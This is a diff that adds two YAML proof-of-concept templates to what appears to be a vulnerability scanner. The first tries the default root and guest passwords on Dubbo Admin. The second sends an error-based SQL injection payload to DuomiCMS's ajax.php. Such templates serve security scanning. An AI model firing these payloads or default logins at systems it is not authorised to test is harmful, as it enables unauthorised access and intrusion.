@@ -0,0 +1,20 @@
+name: poc-yaml-dubbo-admin-default-password
+groups:
+  root:
+    - method: GET
+      path: /
+      headers:
+        Authorization: Basic cm9vdDpyb290
+      expression: |
+        response.status == 200 && response.body.bcontains(b"<title>Dubbo Admin</title>") && response.body.bcontains(b": root', '/logout'") && response.body.bcontains(b"/sysinfo/versions")
+  guest:
+    - method: GET
+      path: /
+      headers:
+        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+      expression: |
+        response.status == 200 && response.body.bcontains(b"<title>Dubbo Admin</title>") && response.body.bcontains(b": guest', '/logout'") && response.body.bcontains(b"/sysinfo/versions")
+detail:
+  author: mumu0215(https://github.com/mumu0215)
+  links:
+    - https://www.cnblogs.com/wishwzp/p/9438658.html

WebScan/pocs/duomicms-sqli.yml

@@ -0,0 +1,13 @@
+name: poc-yaml-duomicms-sqli
+rules:
+  - method: GET
+    path: >-
+      /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005)))
+    follow_redirects: false
+    expression: |
+      response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935")
+detail:
+  author: hanxiansheng26(https://github.com/hanxiansheng26)
+  Affected Version: "duomicms<3.0"
+  links:
+    - https://xz.aliyun.com/t/2828